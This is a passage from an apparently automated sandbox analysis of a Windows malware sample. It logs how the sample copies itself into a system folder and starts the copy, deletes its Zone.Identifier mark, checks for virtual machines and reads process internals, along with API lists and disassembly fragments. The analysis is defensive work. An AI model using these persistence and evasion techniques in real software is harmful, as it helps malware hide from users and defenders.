                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeProcess created: C:\Windows\SysWOW64\fphc\KBDTUQ.exe C:\Windows\SysWOW64\fphc\KBDTUQ.exe
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Users\user\Desktop\Eacu0dRnuP.exe 'C:\Users\user\Desktop\Eacu0dRnuP.exe'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
                Source: unknownProcess created: C:\Windows\SysWOW64\fphc\KBDTUQ.exe C:\Windows\SysWOW64\fphc\KBDTUQ.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeProcess created: C:\Windows\SysWOW64\fphc\KBDTUQ.exe C:\Windows\SysWOW64\fphc\KBDTUQ.exe
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00402270 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00402270 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,
                Source: Eacu0dRnuP.exeStatic PE information: real checksum: 0x9ad26 should be: 0x97a8c
                Source: Eacu0dRnuP.exeStatic PE information: real checksum: 0x9ad26 should be: 0x97a8c
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0040E5D3 push ecx; ret
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0040D670 push eax; ret
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0040D670 push eax; ret
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0040DA1C push eax; ret
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0040CF44 push eax; iretd
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865EA0 push ecx; mov dword ptr [esp], 0000A3FDh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865EF0 push ecx; mov dword ptr [esp], 0000669Ch
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865E10 push ecx; mov dword ptr [esp], 0000F5B3h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865F20 push ecx; mov dword ptr [esp], 0000E36Ch
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865CD0 push ecx; mov dword ptr [esp], 00001CE1h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865D90 push ecx; mov dword ptr [esp], 0000B2E0h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865DC0 push ecx; mov dword ptr [esp], 000089FAh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865DF0 push ecx; mov dword ptr [esp], 0000AAF5h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865D00 push ecx; mov dword ptr [esp], 00001F9Eh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865D20 push ecx; mov dword ptr [esp], 0000C5A1h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865D50 push ecx; mov dword ptr [esp], 00006847h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C7A3E push ecx; mov dword ptr [esp], 0000A3FDh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C7ABE push ecx; mov dword ptr [esp], 0000E36Ch
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C7A8E push ecx; mov dword ptr [esp], 0000669Ch
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C786E push ecx; mov dword ptr [esp], 00001CE1h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C78BE push ecx; mov dword ptr [esp], 0000C5A1h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C789E push ecx; mov dword ptr [esp], 00001F9Eh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C78EE push ecx; mov dword ptr [esp], 00006847h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C792E push ecx; mov dword ptr [esp], 0000B2E0h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C795E push ecx; mov dword ptr [esp], 000089FAh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C79AE push ecx; mov dword ptr [esp], 0000F5B3h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C798E push ecx; mov dword ptr [esp], 0000AAF5h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0040E5D3 push ecx; ret
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0040D670 push eax; ret
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0040D670 push eax; ret
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0040DA1C push eax; ret
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0040CF44 push eax; iretd
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865EA0 push ecx; mov dword ptr [esp], 0000A3FDh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865EF0 push ecx; mov dword ptr [esp], 0000669Ch
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865E10 push ecx; mov dword ptr [esp], 0000F5B3h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865F20 push ecx; mov dword ptr [esp], 0000E36Ch
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865CD0 push ecx; mov dword ptr [esp], 00001CE1h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865D90 push ecx; mov dword ptr [esp], 0000B2E0h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865DC0 push ecx; mov dword ptr [esp], 000089FAh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865DF0 push ecx; mov dword ptr [esp], 0000AAF5h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865D00 push ecx; mov dword ptr [esp], 00001F9Eh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865D20 push ecx; mov dword ptr [esp], 0000C5A1h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865D50 push ecx; mov dword ptr [esp], 00006847h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C7A3E push ecx; mov dword ptr [esp], 0000A3FDh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C7ABE push ecx; mov dword ptr [esp], 0000E36Ch
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C7A8E push ecx; mov dword ptr [esp], 0000669Ch
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C786E push ecx; mov dword ptr [esp], 00001CE1h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C78BE push ecx; mov dword ptr [esp], 0000C5A1h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C789E push ecx; mov dword ptr [esp], 00001F9Eh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C78EE push ecx; mov dword ptr [esp], 00006847h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C792E push ecx; mov dword ptr [esp], 0000B2E0h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C795E push ecx; mov dword ptr [esp], 000089FAh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C79AE push ecx; mov dword ptr [esp], 0000F5B3h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C798E push ecx; mov dword ptr [esp], 0000AAF5h
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_0040E5D3 push ecx; ret
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_0040D670 push eax; ret
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_0040D670 push eax; ret
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_0040DA1C push eax; ret

                Persistence and Installation Behavior:

                barindex
                Drops executables to the windows directory (C:\Windows) and starts themShow sources
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeExecutable created and started: C:\Windows\SysWOW64\fphc\KBDTUQ.exe
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeExecutable created and started: C:\Windows\SysWOW64\fphc\KBDTUQ.exe
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exePE file moved: C:\Windows\SysWOW64\fphc\KBDTUQ.exeJump to behavior
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exePE file moved: C:\Windows\SysWOW64\fphc\KBDTUQ.exeJump to behavior

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeFile opened: C:\Windows\SysWOW64\fphc\KBDTUQ.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeFile opened: C:\Windows\SysWOW64\fphc\KBDTUQ.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00402FC2 IsIconic,GetWindowPlacement,GetWindowRect,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00402FC2 IsIconic,GetWindowPlacement,GetWindowRect,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_00402FC2 IsIconic,GetWindowPlacement,GetWindowRect,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,
                Source: C:\Windows\System32\svchost.exe TID: 1528Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 1528Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00423C64 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_028638F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00423C64 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_028638F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_00423C64 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_022638F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0040D473 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0040D473 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,
                Source: svchost.exe, 00000004.00000002.493342251.0000022682029000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`sF
                Source: svchost.exe, 00000006.00000002.289462453.0000022CC1140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.496499985.0000022CEC790000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.307963786.0000018A30340000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: svchost.exe, 00000004.00000002.497522334.0000022687462000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                Source: svchost.exe, 00000007.00000002.492738004.000001A534C02000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.497463664.0000022687455000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWH
                Source: svchost.exe, 00000006.00000002.289462453.0000022CC1140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.496499985.0000022CEC790000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.307963786.0000018A30340000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000006.00000002.289462453.0000022CC1140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.496499985.0000022CEC790000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.307963786.0000018A30340000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: svchost.exe, 00000007.00000002.492925083.000001A534C28000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.493616710.0000022CEBC45000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.493333947.0000021FB3A29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000006.00000002.289462453.0000022CC1140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.496499985.0000022CEC790000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.307963786.0000018A30340000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: svchost.exe, 00000004.00000002.493342251.0000022682029000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`sF
                Source: svchost.exe, 00000006.00000002.289462453.0000022CC1140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.496499985.0000022CEC790000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.307963786.0000018A30340000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: svchost.exe, 00000004.00000002.497522334.0000022687462000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                Source: svchost.exe, 00000007.00000002.492738004.000001A534C02000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.497463664.0000022687455000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWH
                Source: svchost.exe, 00000006.00000002.289462453.0000022CC1140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.496499985.0000022CEC790000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.307963786.0000018A30340000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000006.00000002.289462453.0000022CC1140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.496499985.0000022CEC790000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.307963786.0000018A30340000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: svchost.exe, 00000007.00000002.492925083.000001A534C28000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.493616710.0000022CEBC45000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.493333947.0000021FB3A29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000006.00000002.289462453.0000022CC1140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.496499985.0000022CEC790000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.307963786.0000018A30340000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeProcess information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00402270 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00402270 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00402270 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00402270 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02864E20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02863F20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C5ABE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C69BE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C0456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_024A1030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02864E20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02863F20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C5ABE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C69BE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C0456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_024A1030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02264E20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02263F20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_021D5ABE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_021D095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_021D69BE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_021D0456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02211030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_028642F0 GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_028642F0 GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00411037 SetUnhandledExceptionFilter,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0041104B SetUnhandledExceptionFilter,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00411037 SetUnhandledExceptionFilter,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0041104B SetUnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_00411037 SetUnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_0041104B SetUnhandledExceptionF